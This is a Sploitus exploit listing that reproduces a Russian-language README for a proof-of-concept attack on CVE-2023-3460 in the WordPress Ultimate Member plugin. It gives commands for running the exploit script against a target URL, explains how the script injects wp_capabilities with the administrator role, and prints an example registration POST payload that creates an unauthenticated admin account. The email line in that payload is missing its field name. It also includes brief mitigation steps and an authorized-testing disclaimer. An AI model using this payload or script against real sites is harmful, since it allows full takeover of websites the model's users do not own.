Sploitus

Exploit for CVE-2023-3460

kitploit · 2026-08-30

Exploit Code

MARKDOWN116 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GURJOTEXPERT-CVE-2023-3460
# 🚨 CVE-2023-3460 - Эксплойт повышения привилегий в WordPress Ultimate Member

Это эксплойт типа proof-of-concept (PoC) для CVE-2023-3460 — критической уязвимости в плагине WordPress **Ultimate Member**. Он позволяет **неаутентифицированным пользователям** повышать свои привилегии до **Администратора** путем отправки вредоносного запроса на регистрацию.

> 🔥 **Воздействие:** Полная компрометация сайта через несанкционированное создание учетной записи администратора.

* * *

## 📌 Детали уязвимости

  * **Затронутый плагин:** Ultimate Member
  * **Затронутые версии:** ≤ 2.6.6
  * **Исправленная версия:** 2.6.7
  * **Тип эксплойта:** Повышение привилегий через злоупотребление регистрацией
  * **Требуется аутентификация:** ❌ Нет
  * **CVE:** CVE-2023-3460



* * *

## ⚙️ Требования

  * Python 3
  * библиотека `requests`
  * библиотека `urllib3`
  * библиотека `beautifulsoup4`



Установка зависимостей:

root@kitploit:~
    
    
    pip3 install requests urllib3 beautifulsoup4
    

* * *

## 🧪 Использование эксплойта

root@kitploit:~
    
    
    python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD> 
    

### ✅ Пример:

root@kitploit:~
    
    
    python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123 
    

* * *

## 📥 Возможности скрипта эксплойта

  * Извлекает CSRF-нонс (`_wpnonce`) со страницы регистрации
  * Обходит валидацию формы
  * Внедряет `wp_capabilities` с ролью `administrator`
  * Создает нового пользователя с правами администратора без аутентификации



* * *

## 🔐 Пример payload эксплойта

root@kitploit:~
    
    
    POST /register/ HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    
    user_login=pwnadmin&
    some-email@example.com&
    user_password=Pass@123&
    wp_càpabilities[administrator]=1&
    _um_nonce=<nonce_value>
    

* * *

## 🛡️ Меры защиты

  * Обновите плагин Ultimate Member до версии **v2.6.7** или выше
  * Отключите открытую регистрацию, если она не требуется
  * Отслеживайте журналы создания пользователей на предмет подозрительной активности



* * *

## 📚 Ссылки

  * 🔗 Консультация Patchstack
  * 🔗 CVE-2023-3460 на NVD



* * *

## ⚠️ Отказ от ответственности

Этот скрипт предоставляется **только для образовательных целей и авторизованного тестирования**. Несанкционированная эксплуатация систем незаконна и неэтична. Используйте его **только** на системах, которыми вы владеете или на тестирование которых получили разрешение.

* * *

## 👨‍💻 Автор

  * 💀 [ГУРДЖОТ СИНГХ]
  * 🔒 [LinkedIn: https://in.linkedin.com/in/gurjot-singh-8198b3220]